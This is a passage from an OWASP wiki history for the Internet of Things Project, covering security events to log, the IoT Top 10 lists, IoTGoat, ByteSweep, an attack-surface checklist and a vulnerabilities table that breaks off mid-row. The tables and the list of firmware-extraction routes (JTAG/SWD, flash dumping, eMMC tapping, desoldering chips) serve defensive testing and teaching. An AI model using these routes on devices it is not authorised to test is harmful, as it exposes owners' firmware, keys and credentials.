| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255834OWASP Internet of Things Project2019-10-31T15:06:40Z<p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
